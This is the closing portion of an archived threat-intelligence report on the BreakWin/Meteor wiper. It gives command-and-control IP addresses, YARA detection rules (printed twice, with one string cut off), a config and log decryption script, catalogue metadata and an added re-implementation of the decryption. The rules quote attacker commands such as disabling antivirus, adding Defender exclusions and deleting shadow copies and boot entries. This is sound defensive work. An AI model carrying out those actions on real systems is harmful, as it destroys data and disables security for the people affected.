C\u0026C servers:\r\n68.183.79.77 167.172.177.158 139.59.89.238 172.105.42.64\r\nAppendix B – Yara Rules\r\nrule ZZ_breakwin_config {\r\n    meta:\r\n        description = \"Detects the header of the encrypted config files, assuming known encryption key.\"\r\n        author = \"Check Point Research\"\r\n        date = \"22-07-2021\"\r\n        hash = \"948febaab71727217303e0aabb9126f242aa51f89caa7f070a3da76c4f5699ed\"\r\n        hash = \"2d35bb7c02062ff2fba4424a267c5c83351405281a1870f52d02f3712a547a22\"\r\n        hash = \"68e95a3ccde3ea22b8eb8adcf0ad53c7993b2ea5316948e31d9eadd11b5151d7\"\r\n    strings:\r\n        $conf_header = {1A 69 45 47 5E 46 4A 06 03 E4 34 0B 06 1D ED 2F 02 15 02 E5 57 4D 59 59 D1 40 20 22}\r\n    condition:\r\n        $conf_header at 0\r\n}\r\n\r\nrule ZZ_breakwin_wiper {\r\n    meta:\r\n        description = \"Detects the BreakWin wiper that was used in attacks in Syria\"\r\n        author = \"Check Point Research\"\r\n        date = \"22-07-2021\"\r\n        hash = \"2aa6e42cb33ec3c132ffce425a92dfdb5e29d8ac112631aec068c8a78314d49b\"\r\n        hash = \"6709d332fbd5cde1d8e5b0373b6ff70c85fee73bd911ab3f1232bb5db9242dd4\"\r\n        hash = \"d71cc6337efb5cbbb400d57c8fdeb48d7af12a292fa87a55e8705d18b09f516e\"\r\n    strings:\r\n        $debug_str_meteor_1 = \"the program received an invalid number of arguments\" wide\r\n        $debug_str_meteor_2 = \"End interval logger. Resuming writing every log\" wide\r\n        $debug_str_meteor_0 = \"failed to initialize configuration from file\" wide\r\n        $debug_str_meteor_3 = \"Meteor is still alive.\" wide\r\n        $debug_str_meteor_4 = \"Exiting main function because of some error\" wide\r\n        $debug_str_meteor_5 = \"Meteor has finished. This shouldn't be possible because of the is-alive loop.\" wide\r\n        $debug_str_meteor_6 = \"Meteor has started.\" wide\r\n        $debug_str_meteor_7 = \"Could not hide current console.\" wide\r\n        $debug_str_meteor_8 = \"Could not get the window handle used by the console.\" wide\r\n        $debug_str_meteor_9 = \"Failed to find base-64 data size\" wide\r\n        $debug_str_meteor_10 = \"Running locker thread\" wide\r\n        $debug_str_meteor_11 = \"Failed to encode wide-character string as Base64\" wide\r\n        $debug_str_meteor_12 = \"Wiper operation failed.\" wide\r\n        $debug_str_meteor_13 = \"Screen saver disable failed.\" wide\r\n        $debug_str_meteor_14 = \"Failed to generate password of length %s. Generating a default one.\" wide\r\n        $debug_str_meteor_15 = \"Failed to delete boot configuration\" wide\r\n        $debug_str_meteor_16 = \"Could not delete all BCD entries.\" wide\r\n        $debug_str_meteor_17 = \"Finished deleting BCD entries.\" wide\r\n        $debug_str_meteor_18 = \"Failed to change lock screen\" wide\r\n        $debug_str_meteor_19 = \"Boot configuration deleted successfully\" wide\r\n        $debug_str_meteor_20 = \"Failed to kill all winlogon processes\" wide\r\n        $debug_str_meteor_21 = \"Changing passwords of all users to\" wide\r\n        $debug_str_meteor_22 = \"Failed to change the passwords of all users\" wide\r\n        $debug_str_meteor_23 = \"Failed to run the locker thread\" wide\r\n        $debug_str_meteor_24 = \"Screen saver disabled successfully.\" wide\r\n        $debug_str_meteor_25 = \"Generating random password failed\" wide\r\n        $debug_str_meteor_26 = \"Locker installation failed\" wide\r\n        $debug_str_meteor_27 = \"Failed to set auto logon.\" wide\r\n        $debug_str_meteor_28 = \"Failed to initialize interval logger. Using a dummy logger instead.\" wide\r\n        $debug_str_meteor_29 = \"Succeeded setting auto logon for\" wide\r\n        $debug_str_meteor_30 = \"Failed disabling the first logon privacy settings user approval.\" wide\r\n        $debug_str_meteor_31 = \"Failed disabling the first logon animation.\" wide\r\n        $debug_str_meteor_32 = \"Waiting for new winlogon process\" wide\r\n        $debug_str_meteor_33 = \"Failed to isolate from domain\" wide\r\n        $debug_str_meteor_34 = \"Failed creating scheduled task for system with name %s.\" wide\r\n        $debug_str_meteor_35 = \"Failed to get the new token of winlogon.\" wide\r\n        $debug_str_meteor_36 = \"Failed adding new admin user.\" wide\r\n        $debug_str_meteor_37 = \"Failed changing settings for the created new user.\" wide\r\n        $debug_str_meteor_38 = \"Failed disabling recovery mode.\" wide\r\n        $debug_str_meteor_39 = \"Logging off users on Windows version 8 or above\" wide\r\n        $debug_str_meteor_40 = \"Succeeded setting boot policy to ignore all errors.\" wide\r\n        $debug_str_meteor_41 = \"Succeeded creating scheduled task for system with name\" wide\r\n        $debug_str_meteor_42 = \"Succeeded disabling recovery mode\" wide\r\n        $debug_str_meteor_43 = \"Failed to log off all sessions\" wide\r\n        $debug_str_meteor_44 = \"Failed to delete shadowcopies.\" wide\r\n        $debug_str_meteor_45 = \"Failed logging off session: \" wide\r\n        $debug_str_meteor_46 = \"Failed setting boot policy to ignore all errors.\" wide\r\n        $debug_str_meteor_47 = \"Successfully logged off all local sessions, except winlogon.\" wide\r\n        $debug_str_meteor_48 = \"Succeeded creating scheduled task with name %s for user %s.\" wide\r\n        $debug_str_meteor_49 = \"Killing all winlogon processes\" wide\r\n        $debug_str_meteor_50 = \"Logging off users in Windows 7\" wide\r\n        $debug_str_meteor_51 = \"Failed logging off all local sessions, except winlogon.\" wide\r\n        $debug_str_meteor_52 = \"Failed creating scheduled task with name %s for user %s.\" wide\r\n        $debug_str_meteor_53 = \"Succeeded deleting shadowcopies.\" wide\r\n        $debug_str_meteor_54 = \"Logging off users in Windows XP\" wide\r\n        $debug_str_meteor_55 = \"Failed changing settings for the created new user.\" wide\r\n        $debug_str_meteor_56 = \"Could not open file %s. error message: %s\" wide\r\n        $debug_str_meteor_57 = \"Could not write to file %s. error message: %s\" wide\r\n        $debug_str_meteor_58 = \"tCould not tell file pointer location on file %s.\" wide\r\n        $debug_str_meteor_59 = \"Could not set file pointer location on file %s to offset %s.\" wide\r\n        $debug_str_meteor_60 = \"Could not read from file %s. error message: %s\" wide\r\n        $debug_str_meteor_61 = \"Failed to wipe file %s\" wide\r\n        $debug_str_meteor_62 = \"attempted to access encrypted file in offset %s, but it only supports offset 0\" wide\r\n        $debug_str_meteor_63 = \"Failed to create thread. Error message: %s\" wide\r\n        $debug_str_meteor_64 = \"Failed to wipe file %s\" wide\r\n        $debug_str_meteor_65 = \"failed to get configuration value with key %s\" wide\r\n        $debug_str_meteor_66 = \"failed to parse the configuration from file %s\" wide\r\n        $debug_str_meteor_67 = \"Failed posting to server, received unknown exception\" wide\r\n        $debug_str_meteor_68 = \"Failed posting to server, received std::exception\" wide\r\n        $debug_str_meteor_69 = \"Skipping %s logs. Writing log number %s:\" wide\r\n        $debug_str_meteor_70 = \"Start interval logger. Writing logs with an interval of %s logs.\" wide\r\n        $debug_str_meteor_71 = \"failed to write message to log file %s\" wide\r\n        $debug_str_meteor_72 = \"The log message is too big: %s/%s characters.\" wide\r\n        $debug_str_stardust_0 = \"Stardust has started.\" wide\r\n        $debug_str_stardust_1 = \"0Vy0qMGO\" ascii wide\r\n        $debug_str_comet_0 = \"Comet has started.\" wide\r\n        $debug_str_comet_1 = \"Comet has finished.\" wide\r\n        $str_lock_my_pc = \"Lock My PC 4\" ascii wide\r\n        $config_entry_0 = \"state_path\" ascii\r\n        $config_entry_1 = \"state_encryption_key\" ascii\r\n        $config_entry_2 = \"log_server_port\" ascii\r\n        $config_entry_3 = \"log_file_path\" ascii\r\n        $config_entry_4 = \"log_encryption_key\" ascii\r\n        $config_entry_5 = \"log_server_ip\" ascii\r\n        $config_entry_6 = \"processes_to_kill\" ascii\r\n        $config_entry_7 = \"process_termination_timeout\" ascii\r\n        $config_entry_8 = \"paths_to_wipe\" ascii\r\n        $config_entry_9 = \"wiping_stage_logger_interval\" ascii\r\n        $config_entry_10 = \"locker_exe_path\" ascii\r\n        $config_entry_11 = \"locker_background_image_jpg_path\" ascii\r\n        $config_entry_12 = \"auto_logon_path\" ascii\r\n        $config_entry_13 = \"locker_installer_path\" ascii\r\n        $config_entry_14 = \"locker_password_hash\" ascii\r\n        $config_entry_15 = \"users_password\" ascii\r\n        $config_entry_16 = \"locker_background_image_bmp_path\" ascii\r\n        $config_entry_17 = \"locker_registry_settings_files\" ascii\r\n        $config_entry_18 = \"cleanup_script_path\" ascii\r\n        $config_entry_19 = \"is_alive_loop_interval\" ascii\r\n        $config_entry_20 = \"cleanup_scheduled_task_name\" ascii\r\n        $config_entry_21 = \"self_scheduled_task_name\" ascii\r\n        $encryption_asm = {33 D2 8B C3 F7 75 E8 8B 41 04 8B 4E 04 8A 04 02 02 C3 32 04 1F 88 45 F3 39 4E 08}\r\n        $random_string_generation = {33 D2 59 F7 F1 83 ?? ?? 08 66 0F BE 82 ?? ?? ?? 00 0F B7 C8 8B C7}\r\n    condition:\r\n        uint16(0) == 0x5A4D and ( 6 of them or $encryption_asm or $random_string_generation )\r\n}\r\n\r\nrule ZZ_breakwin_stardust_vbs {\r\n    meta:\r\n        description = \"Detect the VBS files that were found in the attacks on targets in Syria\"\r\n        author = \"Check Point Research\"\r\n        date = \"22-07-2021\"\r\n        hash = \"38a419cd9456e40961c781e16ceee99d970be4e9235ccce0b316efe68aba3933\"\r\n        hash = \"62a984981d14b562939294df9e479ac0d65dfc412d0449114ccb2a0bc93769b0\"\r\n        hash = \"4d994b864d785abccef829d84f91d949562d0af934114b65056315bf59c1ef58\"\r\n        hash = \"eb5237d56c0467b5def9a92e445e34eeed9af2fee28f3a2d2600363724d6f8b0\"\r\n        hash = \"5553ba3dc141cd63878a7f9f0a0e67fb7e887010c0614efd97bbc6c0be9ec2ad\"\r\n    strings:\r\n        $url_template = \"progress.php?hn=\\\" \u0026 CN \u0026 \\\"\u0026dt=\\\" \u0026 DT \u0026 \\\"\u0026st=\"\r\n        $compression_password_1 = \"YWhZMFU1VlZGdGNFNWlhMVlVMnhTMWtOVlJVWWNGTk9iVTQxVW10V0ZFeFJUMD0r\"\r\n        $compression_password_2 = \"YWlvcyBqQCNAciNxIGpmc2FkKnIoOUZURjlVSjBSRjJRSlJGODlKSDIzRmloIG8\"\r\n        $uninstall_kaspersky = \"Shell.Run \\\"msiexec.exe /x \\\" \u0026 productcode \u0026 \\\" KLLOGIN=\"\r\n        $is_avp_running = \"isProcessRunning(\\\".\\\", \\\"avp.exe\\\") Then\"\r\n    condition:\r\n        any of them\r\n}\r\n\r\nrule ZZ_breakwin_meteor_batch_files {\r\n    meta:\r\n        description = \"Detect the batch files used in the attacks\"\r\n        author = \"Check Point Research\"\r\n        date = \"22-07-2021\"\r\n    strings:\r\n        $filename_0 = \"mscap.bmp\"\r\n        $filename_1 = \"mscap.jpg\"\r\n        $filename_2 = \"msconf.conf\"\r\n        $filename_3 = \"msmachine.reg\"\r\n        $filename_4 = \"mssetup.exe\"\r\n        $filename_5 = \"msuser.reg\"\r\n        $filename_6 = \"msapp.exe\"\r\n        $filename_7 = \"bcd.rar\"\r\n        $filename_8 = \"bcd.bat\"\r\n        $filename_9 = \"msrun.bat\"\r\n        $command_line_0 = \"powershell -Command \\\"%exclude_command% '%defender_exclusion_folder%\"\r\n        $command_line_1 = \"start /b \\\"\\\" update.bat hackemall\"\r\n    condition:\r\n        4 of ($filename_*) or any of ($command_line_*)\r\n}\r\n\r\nrule ZZ_breakwin_config {\r\n meta:\r\n description = \"Detects the header of the 
encrypted config files, assuming known encryption key\"\r\n author = \"Check Point Research\"\r\n date = \"22-07-2021\"\r\n hash = \"948febaab71727217303e0aabb9126f242aa51f89caa7f070a3da76c4f5699ed\"\r\n hash = \"2d35bb7c02062ff2fba4424a267c5c83351405281a1870f52d02f3712a547a22\"\r\n hash = \"68e95a3ccde3ea22b8eb8adcf0ad53c7993b2ea5316948e31d9eadd11b5151d7\"\r\n strings:\r\n $conf_header = {1A 69 45 47 5E 46 4A 06 03 E4 34 0B 06 1D ED 2F 02 15 02 E5 57 4D 59}\r\n condition:\r\n $conf_header at 0\r\n}\r\nrule ZZ_breakwin_wiper {\r\n meta:\r\n description = \"Detects the BreakWin wiper that was used in attacks in Syria\"\r\n author = \"Check Point Research\"\r\n date = \"22-07-2021\"\r\n hash = \"2aa6e42cb33ec3c132ffce425a92dfdb5e29d8ac112631aec068c8a78314d49b\"\r\n hash = \"6709d332fbd5cde1d8e5b0373b6ff70c85fee73bd911ab3f1232bb5db9242dd4\"\r\n hash = \"d71cc6337efb5cbbb400d57c8fdeb48d7af12a292fa87a55e8705d18b09f516e\"\r\n strings:\r\n $debug_str_meteor_1 = \"the program received an invalid number of arguments\" wide\r\n $debug_str_meteor_2 = \"End interval logger. Resuming writing every log\" wide\r\n $debug_str_meteor_0 = \"failed to initialize configuration from file\" wide\r\n $debug_str_meteor_3 = \"Meteor is still alive.\" wide\r\n $debug_str_meteor_4 = \"Exiting main function because of some error\" wide\r\n $debug_str_meteor_5 = \"Meteor has finished. 
This shouldn't be possible because of the is-aliv\r\n $debug_str_meteor_6 = \"Meteor has started.\" wide\r\n $debug_str_meteor_7 = \"Could not hide current console.\" wide\r\n $debug_str_meteor_8 = \"Could not get the window handle used by the console.\" wide\r\n $debug_str_meteor_9 = \"Failed to find base-64 data size\" wide\r\n $debug_str_meteor_10 = \"Running locker thread\" wide\r\n $debug_str_meteor_11 = \"Failed to encode wide-character string as Base64\" wide\r\n $debug_str_meteor_12 = \"Wiper operation failed.\" wide\r\n $debug_str_meteor_13 = \"Screen saver disable failed.\" wide\r\n $debug_str_meteor_14 = \"Failed to generate password of length %s. Generating a default one.\" wide\r\n $debug_str_meteor_15 = \"Failed to delete boot configuration\" wide\r\n $debug_str_meteor_16 = \"Could not delete all BCD entries.\" wide\r\n $debug_str_meteor_17 = \"Finished deleting BCD entries.\" wide\r\n $debug_str_meteor_18 = \"Failed to change lock screen\" wide\r\n $debug_str_meteor_19 = \"Boot configuration deleted successfully\" wide\r\n $debug_str_meteor_20 = \"Failed to kill all winlogon processes\" wide\r\n $debug_str_meteor_21 = \"Changing passwords of all users to\" wide\r\n $debug_str_meteor_22 = \"Failed to change the passwords of all users\" wide\r\n $debug_str_meteor_23 = \"Failed to run the locker thread\" wide\r\n $debug_str_meteor_24 = \"Screen saver disabled successfully.\" wide\r\n $debug_str_meteor_25 = \"Generating random password failed\" wide\r\n $debug_str_meteor_26 = \"Locker installation failed\" wide\r\n $debug_str_meteor_27 = \"Failed to set auto logon.\" wide\r\n $debug_str_meteor_28 = \"Failed to initialize interval logger. 
Using a dummy logger instead.\" wide\r\n $debug_str_meteor_29 = \"Succeeded setting auto logon for\" wide\r\n $debug_str_meteor_30 = \"Failed disabling the first logon privacy settings user approval.\" wide\r\n $debug_str_meteor_31 = \"Failed disabling the first logon animation.\" wide\r\n $debug_str_meteor_32 = \"Waiting for new winlogon process\" wide\r\n $debug_str_meteor_33 = \"Failed to isolate from domain\" wide\r\n $debug_str_meteor_34 = \"Failed creating scheduled task for system with name %s.\" wide\r\n $debug_str_meteor_35 = \"Failed to get the new token of winlogon.\" wide\r\n $debug_str_meteor_36 = \"Failed adding new admin user.\" wide\r\n $debug_str_meteor_37 = \"Failed changing settings for the created new user.\" wide\r\n $debug_str_meteor_38 = \"Failed disabling recovery mode.\" wide\r\n $debug_str_meteor_39 = \"Logging off users on Windows version 8 or above\" wide\r\n $debug_str_meteor_40 = \"Succeeded setting boot policy to ignore all errors.\" wide\r\n $debug_str_meteor_41 = \"Succeeded creating scheduled task for system with name\" wide\r\n $debug_str_meteor_42 = \"Succeeded disabling recovery mode\" wide\r\n $debug_str_meteor_43 = \"Failed to log off all sessions\" wide\r\n $debug_str_meteor_44 = \"Failed to delete shadowcopies.\" wide\r\n $debug_str_meteor_45 = \"Failed logging off session: \" wide\r\n $debug_str_meteor_46 = \"Failed setting boot policy to ignore all errors.\" wide\r\n $debug_str_meteor_47 = \"Successfully logged off all local sessions, except winlogon.\" wide\r\n $debug_str_meteor_48 = \"Succeeded creating scheduled task with name %s for user %s.\" wide\r\n $debug_str_meteor_49 = \"Killing all winlogon processes\" wide\r\n $debug_str_meteor_50 = \"Logging off users in Windows 7\" wide\r\n $debug_str_meteor_51 = \"Failed logging off all local sessions, except winlogon.\" wide\r\n $debug_str_meteor_52 = \"Failed creating scheduled task with name %s for user %s.\" wide\r\n $debug_str_meteor_53 = \"Succeeded deleting shadowcopies.\" 
wide\r\n $debug_str_meteor_54 = \"Logging off users in Windows XP\" wide\r\n $debug_str_meteor_55 = \"Failed changing settings for the created new user.\" wide\r\n $debug_str_meteor_56 = \"Could not open file %s. error message: %s\" wide\r\n $debug_str_meteor_57 = \"Could not write to file %s. error message: %s\" wide\r\n $debug_str_meteor_58 = \"tCould not tell file pointer location on file %s.\" wide\r\n $debug_str_meteor_59 = \"Could not set file pointer location on file %s to offset %s.\" wide\r\n $debug_str_meteor_60 = \"Could not read from file %s. error message: %s\" wide\r\n $debug_str_meteor_61 = \"Failed to wipe file %s\" wide\r\n $debug_str_meteor_62 = \"attempted to access encrypted file in offset %s, but it only supports offset 0\" wide\r\n $debug_str_meteor_63 = \"Failed to create thread. Error message: %s\" wide\r\n $debug_str_meteor_64 = \"Failed to wipe file %s\" wide\r\n $debug_str_meteor_65 = \"failed to get configuration value with key %s\" wide\r\n $debug_str_meteor_66 = \"failed to parse the configuration from file %s\" wide\r\n $debug_str_meteor_67 = \"Failed posting to server, received unknown exception\" wide\r\n $debug_str_meteor_68 = \"Failed posting to server, received std::exception\" wide\r\n $debug_str_meteor_69 = \"Skipping %s logs. Writing log number %s:\" wide\r\n $debug_str_meteor_70 = \"Start interval logger. 
Writing logs with an interval of %s logs.\" wide\r\n $debug_str_meteor_71 = \"failed to write message to log file %s\" wide\r\n $debug_str_meteor_72 = \"The log message is too big: %s/%s characters.\" wide\r\n $debug_str_stardust_0 = \"Stardust has started.\" wide\r\n $debug_str_stardust_1 = \"0Vy0qMGO\" ascii wide\r\n $debug_str_comet_0 = \"Comet has started.\" wide\r\n $debug_str_comet_1 = \"Comet has finished.\" wide\r\n $str_lock_my_pc = \"Lock My PC 4\" ascii wide\r\n $config_entry_0 = \"state_path\" ascii\r\n $config_entry_1 = \"state_encryption_key\" ascii\r\n $config_entry_2 = \"log_server_port\" ascii\r\n $config_entry_3 = \"log_file_path\" ascii\r\n $config_entry_4 = \"log_encryption_key\" ascii\r\n $config_entry_5 = \"log_server_ip\" ascii\r\n $config_entry_6 = \"processes_to_kill\" ascii\r\n $config_entry_7 = \"process_termination_timeout\" ascii\r\n $config_entry_8 = \"paths_to_wipe\" ascii\r\n $config_entry_9 = \"wiping_stage_logger_interval\" ascii\r\n $config_entry_10 = \"locker_exe_path\" ascii\r\n $config_entry_11 = \"locker_background_image_jpg_path\" ascii\r\n $config_entry_12 = \"auto_logon_path\" ascii\r\n $config_entry_13 = \"locker_installer_path\" ascii\r\n $config_entry_14 = \"locker_password_hash\" ascii\r\n $config_entry_15 = \"users_password\" ascii\r\n $config_entry_16 = \"locker_background_image_bmp_path\" ascii\r\n $config_entry_17 = \"locker_registry_settings_files\" ascii\r\n $config_entry_18 = \"cleanup_script_path\" ascii\r\n $config_entry_19 = \"is_alive_loop_interval\" ascii\r\n $config_entry_20 = \"cleanup_scheduled_task_name\" ascii\r\n $config_entry_21 = \"self_scheduled_task_name\" ascii\r\n $encryption_asm = {33 D2 8B C3 F7 75 E8 8B 41 04 8B 4E 04 8A 04 02 02 C3 32 04 1F 88 45 F3 39 4E 08}\r\n $random_string_generation = {33 D2 59 F7 F1 83 ?? ?? 08 66 0F BE 82 ?? ?? ?? 
00 0F B7 C8 8B C7}\r\n condition:\r\n uint16(0) == 0x5A4D and\r\n (\r\n 6 of them or\r\n $encryption_asm or\r\n $random_string_generation\r\n )\r\n}\r\nrule ZZ_breakwin_stardust_vbs {\r\n meta:\r\n description = \"Detect the VBS files that were found in the attacks on targets in Syria\"\r\n author = \"Check Point Research\"\r\n date = \"22-07-2021\"\r\n hash = \"38a419cd9456e40961c781e16ceee99d970be4e9235ccce0b316efe68aba3933\"\r\n hash = \"62a984981d14b562939294df9e479ac0d65dfc412d0449114ccb2a0bc93769b0\"\r\n hash = \"4d994b864d785abccef829d84f91d949562d0af934114b65056315bf59c1ef58\"\r\n hash = \"eb5237d56c0467b5def9a92e445e34eeed9af2fee28f3a2d2600363724d6f8b0\"\r\n hash = \"5553ba3dc141cd63878a7f9f0a0e67fb7e887010c0614efd97bbc6c0be9ec2ad\"\r\n strings:\r\n $url_template = \"progress.php?hn=\\\" \u0026 CN \u0026 \\\"\u0026dt=\\\" \u0026 DT \u0026 \\\"\u0026st=\"\r\n $compression_password_1 = \"YWhZMFU1VlZGdGNFNWlhMVlVMnhTMWtOVlJVWWNGTk9iVTQxVW10V0ZFeFJUMD0r\"\r\n $compression_password_2 = \"YWlvcyBqQCNAciNxIGpmc2FkKnIoOUZURjlVSjBSRjJRSlJGODlKSDIzRmloIG8\"\r\n $uninstall_kaspersky = \"Shell.Run \\\"msiexec.exe /x \\\" \u0026 productcode \u0026 \\\" KLLOGIN=\"\r\n $is_avp_running = \"isProcessRunning(\\\".\\\", \\\"avp.exe\\\") Then\"\r\n condition:\r\n any of them\r\n}\r\nrule ZZ_breakwin_meteor_batch_files {\r\n meta:\r\n description = \"Detect the batch files used in the attacks\"\r\n author = \"Check Point Research\"\r\n date = \"22-07-2021\"\r\n strings:\r\n $filename_0 = \"mscap.bmp\"\r\n $filename_1 = \"mscap.jpg\"\r\n $filename_2 = \"msconf.conf\"\r\n $filename_3 = \"msmachine.reg\"\r\n $filename_4 = \"mssetup.exe\"\r\n $filename_5 = \"msuser.reg\"\r\n $filename_6 = \"msapp.exe\"\r\n $filename_7 = \"bcd.rar\"\r\n $filename_8 = \"bcd.bat\"\r\n $filename_9 = \"msrun.bat\"\r\n $command_line_0 = \"powershell -Command \\\"%exclude_command% 
'%defender_exclusion_folder%\"\r\n $command_line_1 = \"start /b \\\"\\\" update.bat hackemall\"\r\n condition:\r\n 4 of ($filename_*) or\r\n any of ($command_line_*)\r\n}\r\nAppendix C – Config and Log Decryption Script\r\nfrom malduck import xor, u32\r\ndef decode_buffer(buf, key):\r\n    results = \"\"\r\n    for k,v in enumerate(buf):\r\n        # XOR is rolled by the index of the encrypted character\r\n        results += chr (((k % 256) + key[k % len(key)] ^ v) \u0026 0xff)\r\n    return results\r\ndef decode_log_file(filepath):\r\n    content = open(filepath,'rb').read()\r\n    # every record starts with a 4-byte length; at indexes 0-3 the rolled key 'abcdz' becomes a+0, b+1, c+2, d+3 = 'aceg'\r\n    key = b\"aceg\" # modified 'abcdz' because of shifting indexes\r\n    offset = 0\r\n    while offset \u003c len(content):\r\n        sz = u32(xor(key, content[offset:offset+4])) + 4\r\n        print(decode_buffer(content[offset:offset+sz], b\"abcdz\"))\r\n        offset += sz\r\ndef decode_config(filepath, key=b\"abcdz\"):\r\n    content = open(filepath,'rb').read()\r\n    return decode_buffer(content, key)\r\nSource: https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"MISPGALAXY",
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/"
	],
	"report_names": [
		"indra-hackers-behind-recent-attacks-on-iran"
	],
	"threat_actors": [
		{
			"id": "8309f9cf-9abb-4ce3-aa1e-cda7d7f5c1b3",
			"created_at": "2022-10-25T16:07:23.729215Z",
			"updated_at": "2026-04-10T02:00:04.729076Z",
			"deleted_at": null,
			"main_name": "Indra",
			"aliases": [],
			"source_name": "ETDA:Indra",
			"tools": [
				"Stardust"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8d28f58b-5ea2-4450-a74a-4a1e39caba6e",
			"created_at": "2026-03-16T02:02:50.582318Z",
			"updated_at": "2026-04-10T02:00:03.777263Z",
			"deleted_at": null,
			"main_name": "COASTLIGHT",
			"aliases": [
				"Gonjeshke Darande",
				"Indra",
				"Predatory Sparrow"
			],
			"source_name": "Secureworks:COASTLIGHT",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "219ddb41-2ea8-4121-8b63-8c762f7e15df",
			"created_at": "2023-01-06T13:46:39.384442Z",
			"updated_at": "2026-04-10T02:00:03.309654Z",
			"deleted_at": null,
			"main_name": "Predatory Sparrow",
			"aliases": [
				"Indra",
				"Gonjeshke Darande"
			],
			"source_name": "MISPGALAXY:Predatory Sparrow",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434739,
	"ts_updated_at": 1775792119,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6713bb014aef8caa0bbf5b439368d6bce119664d.pdf",
		"text": "https://archive.orkl.eu/6713bb014aef8caa0bbf5b439368d6bce119664d.txt",
		"img": "https://archive.orkl.eu/6713bb014aef8caa0bbf5b439368d6bce119664d.jpg"
	}
}
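Worked example for Appendix C of the archived text above. The Check Point script depends on malduck and works on whole files, so this is an added re-implementation of the same rolling-XOR scheme in plain Python; it is editor-written example code, not code from the Check Point page. Its check input is something the page itself supplies: the $conf_header byte pattern of rule ZZ_breakwin_config. Decrypting those 23 bytes under the key abcdz yields the opening of the JSON config, which is how a practitioner can confirm both the key and why the rule anchors at offset 0. The function names (rolling_xor, prefix_key, decode_config, encode_log, decode_log) are this example's own; decode_config here takes bytes rather than a path. The log record layout (4-byte little-endian length, encryption stream restarted at index 0 for every record) is inferred from decode_log_file() in Appendix C, and the two sample log messages at the bottom are constructed for the round-trip test.

```python
import struct

# Key the Appendix C script uses for both config and log files.
DEFAULT_KEY = b"abcdz"

# Bytes of $conf_header from rule ZZ_breakwin_config (copied from the YARA rule on the page).
CONF_HEADER = bytes.fromhex(
    "1A 69 45 47 5E 46 4A 06 03 E4 34 0B 06 1D ED 2F 02 15 02 E5 57 4D 59"
)


def rolling_xor(buf: bytes, key: bytes = DEFAULT_KEY, start_index: int = 0) -> bytes:
    """out[k] = ((k % 256) + key[k % len(key)]) ^ buf[k], masked to one byte.

    Same arithmetic as decode_buffer() in Appendix C, on raw bytes. XOR with a
    position-dependent byte is an involution, so one call both encrypts and
    decrypts. start_index continues the stream for a slice that does not begin
    at position 0 of the encrypted object.
    """
    out = bytearray()
    for k, v in enumerate(buf, start=start_index):
        out.append((((k % 256) + key[k % len(key)]) ^ v) & 0xFF)
    return bytes(out)


def prefix_key(key: bytes = DEFAULT_KEY) -> bytes:
    """Effective key bytes for stream positions 0..3 (where a record's length prefix sits).

    For abcdz this is a+0, b+1, c+2, d+3 = b"aceg", which is why the page's
    decode_log_file() XORs the length with "aceg" rather than "abcdz".
    """
    return bytes(((k + key[k % len(key)]) & 0xFF) for k in range(4))


def decode_config(blob: bytes, key: bytes = DEFAULT_KEY) -> str:
    """Decrypt a config file (or the leading bytes of one); the plaintext is JSON text."""
    return rolling_xor(blob, key).decode("latin-1")


def encode_log(messages, key: bytes = DEFAULT_KEY) -> bytes:
    """Build a log blob in the layout decode_log() expects (used here to make test input)."""
    out = bytearray()
    for msg in messages:
        raw = struct.pack("<I", len(msg)) + msg.encode("latin-1")
        out += rolling_xor(raw, key)  # stream restarts at index 0 for every record
    return bytes(out)


def decode_log(blob: bytes, key: bytes = DEFAULT_KEY) -> list:
    """Walk a log file record by record.

    Each record is a 4-byte little-endian length followed by that many message
    bytes, and the whole record (prefix included) is encrypted with the stream
    restarted at index 0. A record that runs past the end of the file raises
    instead of being silently shortened, so a truncated log is noticed.
    """
    records = []
    offset = 0
    while offset < len(blob):
        if offset + 4 > len(blob):
            raise ValueError(f"dangling {len(blob) - offset} byte(s) at offset {offset}")
        size = struct.unpack("<I", rolling_xor(blob[offset:offset + 4], key))[0]
        body = blob[offset + 4:offset + 4 + size]
        if len(body) < size:
            raise ValueError(f"record at offset {offset} claims {size} bytes, only {len(body)} left")
        # Message bytes occupy stream positions 4.. of the record.
        records.append(rolling_xor(body, key, start_index=4).decode("latin-1"))
        offset += 4 + size
    return records


if __name__ == "__main__":
    print(repr(decode_config(CONF_HEADER)))  # '{\n    "log_file_path": '
    print(prefix_key())  # b'aceg'
    # Constructed sample log: two of the Meteor debug strings from the YARA rule as message text.
    sample = encode_log(["Meteor has started.", "Wiper operation failed."])
    print(decode_log(sample))
```

The decrypted header is the string `{`, newline, four spaces, `"log_file_path": `, so the config is pretty-printed JSON whose first key is log_file_path; a rule that matches this ciphertext at offset 0 therefore only fires on configs encrypted under that exact key, which is what the rule's description means by "assuming known encryption key". Note that the page's script parses the length prefix with a plain repeating-key XOR against "aceg"; prefix_key() shows that this is just the rolling stream evaluated at positions 0 to 3, so the two readings agree.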